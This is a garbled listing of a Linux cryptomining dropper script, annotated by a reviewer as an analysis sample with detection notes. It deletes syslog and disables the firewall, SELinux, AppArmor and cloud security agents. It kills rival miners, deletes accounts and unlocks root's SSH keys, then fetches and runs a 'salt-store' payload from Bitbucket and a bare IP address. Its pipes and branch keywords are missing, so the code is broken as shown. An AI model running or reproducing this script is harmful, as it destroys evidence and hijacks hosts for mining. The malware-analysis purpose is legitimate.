# Host preparation stage of a dropper script, read here as an analysis sample.
# NOTE(review): this listing appears to have lost its pipe characters, its
# then/do/done keywords and every repeated line during extraction (quoted
# alternations further down are split across lines as well), so each line is
# best read as one pipeline fragment - confirm against the raw sample.
# Presumably the remnant of a "#!/bin/sh" shebang line.
/bin/sh
# Raises the open-file limit for this shell and its children.
ulimit -n 65535
# Deletes the syslog file: local log evidence is gone after this point, so
# triage should rely on forwarded or remote copies of the log.
rm -rf /var/log/syslog
# Clears the immutable / undeletable / append-only attributes on the temp dirs.
chattr -iua /tmp/
chattr -iua /var/tmp/
# Turns off the host firewall and flushes every iptables rule.
ufw disable
iptables -F
echo "nope" >/tmp/log_rot
# Disables the kernel NMI watchdog at runtime (twice) and persists the setting
# in /etc/sysctl.conf; an unexpected kernel.nmi_watchdog=0 line there is a
# host artefact worth checking for.
sudo sysctl kernel.nmi_watchdog=0
echo '0' >/proc/sys/kernel/nmi_watchdog
echo 'kernel.nmi_watchdog=0' >>/etc/sysctl.conf
# Removes two local accounts by name; who created them is not visible here.
userdel akay
userdel vfinder
# Clears file attributes on root's SSH directory and authorized_keys, which
# makes the key file writable again - review it for unexpected keys.
chattr -iae /root/.ssh/
chattr -iae /root/.ssh/authorized_keys
rm -rf /tmp/addres*
rm -rf /tmp/walle*
rm -rf /tmp/keys
# Removal of cloud-provider host agents (defence evasion).
# NOTE(review): pipes and the then/fi keywords appear to be missing from this
# listing; "if ps aux" + "grep -i ..." is presumably one pipeline.
# Branch 1: a process matching "aliyun" is running. The two uninstall scripts
# are fetched from update.aegis.aliyun.com (presumably piped to a shell - not
# visible here), then the aliyun service, its init script and the aegis
# directories are stopped, disabled and deleted, and bcm-agent is removed
# through whichever package manager is present.
if ps aux
grep -i '[a]liyun'
curl http://update.aegis.aliyun.com/download/uninstall.sh
curl http://update.aegis.aliyun.com/download/quartz_uninstall.sh
pkill aliyun-service
rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service
rm -rf /usr/local/aegis*
systemctl stop aliyun.service
systemctl disable aliyun.service
service bcm-agent stop
yum remove bcm-agent -y
apt-get remove bcm-agent -y
# Branch 2: a process matching "yunjing" is running. The agent's own
# uninstallers under /usr/local/qcloud are executed.
# Detection idea: an agent that stops reporting, or execution of these
# uninstall paths outside a change window, is the observable signal.
elif ps aux
grep -i '[y]unjing'
/usr/local/qcloud/stargate/admin/uninstall.sh
/usr/local/qcloud/YunJing/uninst.sh
/usr/local/qcloud/monitor/barad/admin/uninstall.sh
# Kills processes by their network connections.
# NOTE(review): pipes appear to be missing from this listing; each grep below
# is presumably the filter of its own "netstat -anp | grep X | awk | xargs kill"
# pipeline, with the repeated stages shown only once.
# Column 7 of netstat -anp is PID/program; the second awk keeps the part before
# the slash (the PID), which xargs hands to kill -9.
netstat -anp
grep 185.71.65.238
awk '{print $7}'
awk -F'[/]' '{print $1}'
xargs -I % kill -9 %
grep 140.82.52.87
# From here the filters are port numbers rather than addresses. :443 and :23
# are ordinary service ports, so legitimate connections can match as well.
grep :443
grep -v "-"
grep :23
grep :143
grep :2222
grep :3333
grep :3389
grep :4444
grep :5555
grep :6666
grep :6665
grep :6667
grep :7777
grep :8444
grep :3347
grep :14444
grep :14433
grep :13531
# Process kill list driven by ps output.
# NOTE(review): pipes appear to be missing from this listing; each grep is
# presumably one filter of a "ps aux | grep X | awk {print $2} | xargs kill"
# pipeline whose repeated stages are shown only once. Quoted patterns that
# contained an alternation or a logical OR appear split across two lines.
# What the fragments select on:
#   - command-line substrings: file names under /tmp, IP addresses, script
#     names and random-looking tokens (usable as host indicators as given);
#   - CPU usage: awk prints the PID (column 2) when column 3 (%CPU) exceeds
#     80.0 or 10.0, after grep -v has excluded some process and user names;
#   - shape of the command: column 11 or 12 starting with ./ , or a column 11
#     longer than 19 characters;
#   - two long tokens that look like base64 fragments - decode them before
#     turning them into detection content.
# Generic filters such as wget and curl will also match unrelated processes.
ps aux
grep "sleep 60"
grep -v grep
awk '{print $2}'
grep "./crun"
grep -vw salt-minions
awk '{if($3>80.0) print $2}'
grep ':3333'
grep ':5555'
grep 'kworker -c\'
grep 'log_'
grep 'systemten'
grep 'netns'
grep 'voltuned'
grep 'darwin'
grep '/tmp/dl'
grep '/tmp/ddg'
grep '/tmp/pprt'
grep '/tmp/ppol'
grep '/tmp/65ccE*'
grep '/tmp/jmx*'
grep '/tmp/2Ne80*'
grep 'IOFoqIgyC0zmf2UR'
grep '45.76.122.92'
grep '51.38.191.178'
grep '51.15.56.161'
grep '86s.jpg'
grep 'aGTSGJJp'
grep 'nMrfmnRa'
grep 'PuNY5tm2'
grep 'I0r8Jyyt'
grep 'AgdgACUD'
grep 'uiZvwxG8'
grep 'hahwNEdB'
grep 'BtwXn5qH'
grep '3XEzey2T'
grep 't2tKrCSZ'
grep 'HD7fcBgg'
grep 'zXcDajSs'
grep '3lmigMo'
grep 'AkMK4A2'
grep 'AJ2AkKe'
grep 'HiPxCJRS'
grep 'http_0xCC030'
grep 'http_0xCC031'
grep 'http_0xCC032'
grep 'http_0xCC033'
grep "C4iLM4L"
grep 'aziplcr72qjhzvin'
awk '{ if(substr($11,1,2)=="./"
substr($12,1,2)=="./") print $2 }'
grep '/boot/vmlinuz'
grep "i4b503a52cc5"
grep "dgqtrcst23rtdi3ldqk322j2"
grep "2g0uv7npuhrlatd"
grep "nqscheduler"
grep "rkebbwgqpl4npmm"
grep -v aux
grep "]"
awk '$3>10.0{print $2}'
grep "2fhtu70teuhtoh78jc5s"
grep "0kwti6ut420t"
grep "44ct7udt0patws3agkdfqnjm"
grep -v "/"
grep -v "_"
awk 'length($11)>19{print $2}'
grep "\[
grep "rsync"
grep "watchd0g"
egrep 'wnTKYg
qW3xT.2
grep "158.69.133.18:8220"
grep "/tmp/java"
grep 'gitee.com'
grep '/tmp/java'
grep '104.248.4.162'
grep '89.35.39.78'
grep '/dev/shm/z3.sh'
grep 'kthrotlds'
grep 'ksoftirqds'
grep 'netdns'
grep 'watchdogs'
grep -v root
grep -v dblaunch
grep -v dblaunchs
grep -v dblaunched
grep -v apache2
grep -v atd
grep -v salt-minions
awk '$3>80.0{print $2}'
grep " ps"
grep "sync_supers"
cut -c 9-15
grep "cpuset"
grep "x]"
grep "sh] <"
grep " \[]"
grep '/tmp/l.sh'
grep '/tmp/zmcat'
grep 'CnzFVPLF'
grep 'CvKzzZLs'
grep '/tmp/udevd'
grep 'KCBjdXJsIC1vIC0gaHR0cDovLzg5LjIyMS41Mi4xMjIvcy5zaCApIHwgYmFzaCA'
grep 'Y3VybCAtcyBodHRwOi8vMTA3LjE3NC40Ny4xNTYvbXIuc2ggfCBiYXNoIC1zaAo'
grep 'sustse'
grep 'sustse3'
grep 'mr.sh'
grep 'wget'
grep 'curl'
grep '2mr.sh'
grep 'cr5.sh'
grep 'logo9.jpg'
grep 'j2.conf'
grep 'luk-cpu'
grep 'ficov'
grep 'he.sh'
grep 'miner.sh'
grep 'nullcrew'
grep '107.174.47.156'
grep '83.220.169.247'
grep '51.38.203.146'
grep '144.217.45.45'
grep '107.174.47.181'
grep '176.31.6.16'
# Kill list keyed on mining-pool endpoints and on remote peers.
# NOTE(review): pipes appear to be missing from this listing; each grep is
# presumably the filter of its own pipeline, with repeated stages shown once.
# First group: ps auxf output filtered on pool host names, pool host:port
# pairs, one e-mail address and one /tmp path found in the command line.
# Second group: netstat -antp filtered on a remote address and on the
# ESTABLISHED or SYN_SENT state; the sed expression deletes everything from
# the first slash onward (used on the PID/program column, that keeps the PID
# - the awk stage that would select the column is not visible in this group).
# The host names and addresses are usable as egress and DNS indicators as given.
ps auxf
grep "mine.moneropool.com"
grep "pool.t00ls.ru"
grep "xmr.crypto-pool.fr:8080"
grep "xmr.crypto-pool.fr:3333"
grep "zhuabcn@yahoo.com"
grep "monerohash.com"
grep "/tmp/a7b104c270"
grep "xmr.crypto-pool.fr:6666"
grep "xmr.crypto-pool.fr:7777"
grep "xmr.crypto-pool.fr:443"
grep "stratum.f2pool.com:8888"
grep "xmrpool.eu"
grep xiaoyao
grep xiaoxue
netstat -antp
grep '46.243.253.15'
grep 'ESTABLISHED\
SYN_SENT'
sed -e "s/\/.*//g"
grep '108.174.197.76'
grep '192.236.161.6'
grep '88.99.242.92'
# Kill list keyed on the full command line (pkill -f / pgrep -f).
# NOTE(review): pipes appear to be missing from this listing; the pgrep lines
# only print PIDs, so they were presumably piped into a kill stage that is not
# visible here.
# The patterns are miner names, pool keywords (stratum, cryptonight, xmrig),
# wallet-like strings, IP addresses, config file names and base64-looking
# fragments. Several patterns equal or contain the names of ordinary system
# daemons (polkitd, acpid, irqbalance, vmlinuz), and -f matches anywhere in
# the command line, so unexplained loss of those services on a host is a
# symptom worth correlating with the other artefacts of this script.
pkill -f pastebin
pkill -f 185.193.127.115
pgrep -f monerohash
pgrep -f L2Jpbi9iYXN
pgrep -f xzpauectgr
pgrep -f slxfbkmxtd
pgrep -f mixtape
pgrep -f addnj
pgrep -f 200.68.17.196
pgrep -f IyEvYmluL3NoCgpzUG
pgrep -f KHdnZXQgLXFPLSBodHRw
pgrep -f FEQ3eSp8omko5nx9e97hQ39NS3NMo6rxVQS3
pgrep -f Y3VybCAxOTEuMTAxLjE4MC43Ni9saW4udHh0IHxzaAo
pgrep -f mwyumwdbpq.conf
pgrep -f honvbsasbf.conf
pgrep -f mqdsflm.cf
pgrep -f stratum
pgrep -f lower.sh
pgrep -f ./ppp
pgrep -f cryptonight
pgrep -f ./seervceaess
pgrep -f ./servceaess
pgrep -f ./servceas
pgrep -f ./servcesa
pgrep -f ./vsp
pgrep -f ./jvs
pgrep -f ./pvv
pgrep -f ./vpp
pgrep -f ./pces
pgrep -f ./rspce
pgrep -f ./haveged
pgrep -f ./jiba
pgrep -f ./watchbog
pgrep -f ./A7mA5gb
pgrep -f kacpi_svc
pgrep -f kswap_svc
pgrep -f kauditd_svc
pgrep -f kpsmoused_svc
pgrep -f kseriod_svc
pgrep -f kthreadd_svc
pgrep -f ksoftirqd_svc
pgrep -f kintegrityd_svc
pgrep -f jawa
pgrep -f oracle.jpg
pgrep -f 45cToD1FzkjAxHRBhYKKLg5utMGEN
pgrep -f 188.209.49.54
pgrep -f 181.214.87.241
pgrep -f etnkFgkKMumdqhrqxZ6729U7bY8pzRjYzGbXa5sDQ
pgrep -f 47TdedDgSXjZtJguKmYqha4sSrTvoPXnrYQEq2Lbj
pgrep -f etnkP9UjR55j9TKyiiXWiRELxTS51FjU9e1UapXyK
pgrep -f servim
pgrep -f kblockd_svc
pgrep -f native_svc
pgrep -f ynn
pgrep -f 65ccEJ7
pgrep -f jmxx
pgrep -f 2Ne80nA
pgrep -f sysstats
pgrep -f systemxlv
pgrep -f watchbog
pgrep -f OIcJi1m
pkill -f biosetjenkins
pkill -f Loopback
pkill -f apaceha
pkill -f cryptonight
pkill -f stratum
pkill -f mixnerdx
pkill -f performedl
pkill -f JnKihGjn
pkill -f irqba2anc1
pkill -f irqba5xnc1
pkill -f irqbnc1
pkill -f ir29xc1
pkill -f conns
pkill -f irqbalance
pkill -f crypto-pool
pkill -f XJnRj
pkill -f mgwsl
pkill -f pythno
pkill -f jweri
pkill -f lx26
pkill -f NXLAi
pkill -f BI5zj
pkill -f askdljlqw
pkill -f minerd
pkill -f minergate
pkill -f Guard.sh
pkill -f ysaydh
pkill -f bonns
pkill -f donns
pkill -f kxjd
pkill -f Duck.sh
pkill -f bonn.sh
pkill -f conn.sh
pkill -f kworker34
pkill -f kw.sh
pkill -f pro.sh
pkill -f polkitd
pkill -f acpid
pkill -f icb5o
pkill -f nopxi
pkill -f irqbalanc1
pkill -f i586
pkill -f gddr
pkill -f mstxmr
pkill -f ddg.2011
pkill -f wnTKYg
pkill -f deamon
pkill -f disk_genius
pkill -f sourplum
pkill -f nanoWatch
pkill -f zigw
pkill -f devtool
pkill -f devtools
pkill -f systemctI
pkill -f watchbog
pkill -f sustes
pkill -f xmrig
pkill -f xmrig-cpu
pkill -f 121.42.151.137
pkill -f sysguard
pkill -f networkservice
pkill -f sysupdate
pkill -f init12.cfg
pkill -f nginxk
pkill -f tmp/wc.conf
pkill -f xmrig-notls
pkill -f xmr-stak
pkill -f suppoie
pkill -f zer0day.ru
pkill -f dbus-daemon--system
pkill -f nullcrew
pkill -f kworkerds
pkill -f init10.cfg
pkill -f /wl.conf
pkill -f crond64
pkill -f sustse
pkill -f vmlinuz
pkill -f exin
pkill -f apachiii
# File clean-up list: deletes named files and directories under /tmp,
# /var/tmp, /dev/shm, /usr/bin, /etc and the Confluence bin directory.
# NOTE(review): repeated lines appear to have been dropped from this listing,
# so the order of statements may not match the original sample.
# Points of interest for triage:
#   - the paths are usable as host artefacts as given; most are dot-files or
#     short random-looking names in world-writable directories;
#   - /etc/ld.so.preload and /usr/local/lib/libioset.so are removed, and the
#     immutable flag on ld.so.preload is cleared; any non-empty ld.so.preload
#     on a host deserves review because it preloads a library into processes;
#   - init scripts and a cron.d entry named watchdogs, kthrotlds and tomcat
#     are removed, i.e. persistence locations are touched;
#   - /tmp/lok has its attributes cleared and its mode changed before removal;
#   - whoever runs this loses forensic copies of these files, so collect
#     images or backups before any of this is allowed to run in a lab.
rm -rf /usr/bin/config.json
rm -rf /usr/bin/exin
killall log_rot
pkill -f log_rot
rm -rf /tmp/wc.conf
rm -rf /tmp/log_rot
rm -rf /tmp/apachiii
rm -rf /tmp/sustse
rm -rf /tmp/php
rm -rf /tmp/p2.conf
rm -rf /tmp/pprt
rm -rf /tmp/ppol
rm -rf /tmp/javax/config.sh
rm -rf /tmp/javax/sshd2
rm -rf /tmp/.profile
rm -rf /tmp/1.so
rm -rf /tmp/kworkerds
rm -rf /tmp/kworkerds3
rm -rf /tmp/kworkerdssx
rm -rf /tmp/xd.json
rm -rf /tmp/syslogd
rm -rf /tmp/syslogdb
rm -rf /tmp/65ccEJ7
rm -rf /tmp/jmxx
rm -rf /tmp/2Ne80nA
rm -rf /tmp/dl
rm -rf /tmp/ddg
rm -rf /tmp/systemxlv
rm -rf /tmp/systemctI
rm -rf /tmp/.abc
rm -rf /tmp/osw.hb
rm -rf /tmp/.tmpleve
rm -rf /tmp/.tmpnewzz
rm -rf /tmp/.java
rm -rf /tmp/.omed
rm -rf /tmp/.tmpc
rm -rf /tmp/gates.lod
rm -rf /tmp/conf.n
rm -rf /tmp/update.sh
rm -rf /tmp/devtool
rm -rf /tmp/devtools
rm -rf /tmp/fs
rm -rf /tmp/.rod
rm -rf /tmp/.rod.tgz
rm -rf /tmp/.rod.tgz.1
rm -rf /tmp/.rod.tgz.2
rm -rf /tmp/.mer
rm -rf /tmp/.mer.tgz
rm -rf /tmp/.mer.tgz.1
rm -rf /tmp/.hod
rm -rf /tmp/.hod.tgz
rm -rf /tmp/.hod.tgz.1
rm -rf /tmp/84Onmce
rm -rf /tmp/C4iLM4L
rm -rf /tmp/lilpip
rm -rf /tmp/3lmigMo
rm -rf /tmp/am8jmBP
rm -rf /tmp/tmp.txt
rm -rf /tmp/baby
rm -rf /tmp/.lib
rm -rf /tmp/systemd
rm -rf /tmp/lib.tar.gz
rm -rf /tmp/java
rm -rf /tmp/j2.conf
rm -rf /tmp/.mynews1234
rm -rf /tmp/a3e12d
rm -rf /tmp/.pt
rm -rf /tmp/.pt.tgz
rm -rf /tmp/.pt.tgz.1
rm -rf /tmp/go
rm -rf /tmp/.tmpnewasss
rm -rf /tmp/go.sh
rm -rf /tmp/go2.sh
rm -rf /tmp/khugepageds
rm -rf /tmp/.censusqqqqqqqqq
rm -rf /tmp/.kerberods
rm -rf /tmp/kerberods
rm -rf /tmp/seasame
rm -rf /tmp/touch
rm -rf /tmp/.p
rm -rf /tmp/runtime2.sh
rm -rf /tmp/runtime.sh
rm -rf /dev/shm/z3.sh
rm -rf /dev/shm/z2.sh
rm -rf /dev/shm/.scr
rm -rf /dev/shm/.kerberods
rm -f /etc/ld.so.preload
rm -f /usr/local/lib/libioset.so
chattr -i /etc/ld.so.preload
rm -rf /tmp/watchdogs
rm -rf /etc/cron.d/tomcat
rm -rf /etc/rc.d/init.d/watchdogs
rm -rf /usr/sbin/watchdogs
rm -f /tmp/kthrotlds
rm -f /etc/rc.d/init.d/kthrotlds
rm -rf /tmp/.sysbabyuuuuu12
rm -rf /tmp/logo9.jpg
rm -rf /tmp/miner.sh
rm -rf /tmp/nullcrew
rm -rf /tmp/proc
rm -rf /tmp/2.sh
rm /opt/atlassian/confluence/bin/1.sh
rm /opt/atlassian/confluence/bin/1.sh.1
rm /opt/atlassian/confluence/bin/1.sh.2
rm /opt/atlassian/confluence/bin/1.sh.3
rm /opt/atlassian/confluence/bin/3.sh
rm /opt/atlassian/confluence/bin/3.sh.1
rm /opt/atlassian/confluence/bin/3.sh.2
rm /opt/atlassian/confluence/bin/3.sh.3
rm -rf /var/tmp/f41
rm -rf /var/tmp/2.sh
rm -rf /var/tmp/config.json
rm -rf /var/tmp/xmrig
rm -rf /var/tmp/1.so
rm -rf /var/tmp/kworkerds3
rm -rf /var/tmp/kworkerdssx
rm -rf /var/tmp/kworkerds
rm -rf /var/tmp/wc.conf
rm -rf /var/tmp/nadezhda.
rm -rf /var/tmp/nadezhda.arm
rm -rf /var/tmp/nadezhda.arm.1
rm -rf /var/tmp/nadezhda.arm.2
rm -rf /var/tmp/nadezhda.x86_64
rm -rf /var/tmp/nadezhda.x86_64.1
rm -rf /var/tmp/nadezhda.x86_64.2
rm -rf /var/tmp/sustse3
rm -rf /var/tmp/sustse
rm -rf /var/tmp/moneroocean/
rm -rf /var/tmp/devtool
rm -rf /var/tmp/devtools
rm -rf /var/tmp/play.sh
rm -rf /var/tmp/systemctI
rm -rf /var/tmp/update.sh
rm -rf /var/tmp/.java
rm -rf /var/tmp/1.sh
rm -rf /var/tmp/conf.n
rm -r /var/tmp/lib
rm -r /var/tmp/.lib
rm -rf /tmp/config.json
chattr -iau /tmp/lok
chmod +700 /tmp/lok
rm -rf /tmp/lok
# Container clean-up through the docker CLI.
# NOTE(review): pipes appear to be missing from this listing; each grep is
# presumably the filter of its own docker pipeline, repeated stages shown once.
# The docker client package is installed first. Then:
#   - docker ps output is filtered on a substring, column 1 (container id) is
#     taken and passed to docker kill;
#   - docker images -a output is filtered on a substring, column 3 (image id)
#     is taken and passed to docker rmi -f.
# Filters such as auto, mine and registry are short and generic, so unrelated
# containers and images on the host can match and be removed. Docker daemon
# events for kill and image delete are the place to look for this activity.
yum install -y docker.io
apt-get install docker.io
docker ps
grep "pocosow"
awk '{print $1}'
xargs -I % docker kill %
grep "gakeaws"
grep "azulu"
grep "auto"
grep "xmr"
grep "mine"
grep "monero"
grep "slowhttp"
grep "bash.shell"
grep "entrypoint.sh"
grep "/var/sbin/bash"
docker images -a
awk '{print $3}'
xargs -I % docker rmi -f %
grep "buster-slim"
grep "hello-"
grep "registry"
# Disables mandatory access control and the Aliyun agent.
# NOTE(review): pipes appear to be missing from this listing; the two greps
# are presumably filters of pipelines whose other stages are not visible.
# setenforce 0 switches SELinux to permissive for the running system.
setenforce 0
# The redirect truncates /etc/selinux/config to this single line, so the
# change survives a reboot and the rest of the file is lost; comparing the
# file against the packaged default detects it.
echo SELINUX=disabled >/etc/selinux/config
# AppArmor is stopped now and disabled for later boots.
service apparmor stop
systemctl disable apparmor
service aliyun.service stop
grep 'aegis'
grep 'Yun'
rm -rf /usr/local/aegis
# Download tool selection, working directory selection and a check of an
# existing payload copy.
# NOTE(review): pipes and the then/else/fi keywords appear to be missing or
# shown only once in this listing, so the branch structure is inferred.
# LDR and WGET are set to either a wget or a curl command line depending on
# which of /usr/bin/curl and /usr/bin/wget exists and is non-empty.
LDR="wget -q -O -"
if [ -s /usr/bin/curl ]
LDR="curl"
if [ -s /usr/bin/wget ]
WGET="wget -O"
WGET="curl -o"
# DIR defaults to /tmp.
DIR="/tmp"
# If /tmp/salt-store already exists, its writability is tested and, when
# md5sum is available, its MD5 is compared with the one expected value
# 8ec3385e20d6d9a88bc95831783beaeb. A mismatch deletes the file. That hash and
# the file name salt-store are usable as host indicators as given; MD5 alone
# is weak for identification, so pair it with a SHA-256 of a collected sample.
if [ -e "/tmp/salt-store" ]
if [ -w "/tmp/salt-store" ]
-d "/tmp/salt-store" ]
if [ -x "$(command -v md5sum)" ]
sum=$(md5sum /tmp/salt-store
awk '{ print $1 }')
echo $sum
case $sum in
8ec3385e20d6d9a88bc95831783beaeb)
echo "salt-store OK"
*)
echo "salt-store wrong"
rm -rf /tmp/salt-store
sleep 1
esac
fi
echo "P OK"
else
# Fallback locations: a fresh mktemp directory with a tmp subdirectory, or
# /var/tmp when that directory exists.
DIR=$(mktemp -d)/tmp
mkdir $DIR
echo "T DIR $DIR"
if [ -d "/var/tmp" ]
DIR="/var/tmp"
echo "P NOT EXISTS"
# Payload retrieval and execution.
# NOTE(review): the function bodies are incomplete in this listing (closing
# braces, conditionals and repeated lines are not visible), so the call order
# below is inferred from the names only.
# download computes the MD5 of DIR/salt-store and hands over to download2.
# download2 fetches salt-store from a Bitbucket raw URL and marks it
# executable; download3 fetches the same file name from a bare IP address
# over plain HTTP. Both URLs are usable as proxy and DNS indicators as given.
# The last line runs the binary with the environment variable SKL set to sa;
# a process named salt-store started from /tmp or /var/tmp with SKL in its
# environment is the execution artefact to hunt for.
download() {
sum=$(md5sum $DIR/salt-store
download2
echo "No md5sum"
download2() {
$WGET $DIR/salt-store https://bitbucket.org/samk12dd/git/raw/master/salt-store
chmod +x $DIR/salt-store
download3
download3() {
$WGET $DIR/salt-store http://217.12.210.192/salt-store
download
SKL=sa $DIR/salt-store
# Rewrites the current user crontab.
# NOTE(review): pipes appear to be missing from this listing; each sed is
# presumably the middle stage of its own pipeline that lists the crontab,
# deletes matching lines and loads the result back, with the first and last
# stage shown only once.
# Each sed expression deletes every crontab line containing the given text.
# Several expressions are very broad: tmp, ash, jpg and png match any line
# containing those letters (ash matches bash), so legitimate jobs are removed
# too. Cron jobs that vanish without a change record are therefore a symptom
# to correlate with the other artefacts; keep crontabs under backup or
# configuration management so the loss is detectable and recoverable.
crontab -l
sed '/update.sh/d'
crontab -
sed '/logo4/d'
sed '/logo9/d'
sed '/logo0/d'
sed '/logo/d'
sed '/tor2web/d'
sed '/jpg/d'
sed '/png/d'
sed '/tmp/d'
sed '/zmreplchkr/d'
sed '/aliyun.one/d'
sed '/3.215.110.66.one/d'
sed '/pastebin/d'
sed '/onion/d'
sed '/lsd.systemten.org/d'
sed '/shuf/d'
sed '/ash/d'
sed '/mr.sh/d'
sed '/185.181.10.234/d'
sed '/localhost.xyz/d'